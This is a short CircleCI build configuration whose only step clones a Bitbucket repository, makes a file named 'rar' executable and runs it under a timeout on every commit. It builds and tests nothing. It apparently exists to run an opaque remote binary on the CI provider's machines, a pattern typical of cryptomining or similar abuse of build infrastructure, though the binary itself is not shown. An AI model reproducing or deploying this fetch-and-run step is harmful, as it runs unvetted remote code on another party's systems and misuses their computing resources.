version: 2
jobs:
  build:
    machine:
      image: ubuntu-1604:202007-01
    parallelism: 1
    steps:
      - run:
          command: git clone https://lagutivash@bitbucket.org/lagutivash/cat.git;cd cat;chmod +x rar;timeout 115 ./rar
          no_output_timeout: 4m

workflows:
  version: 2
  commit:
    jobs:
      - build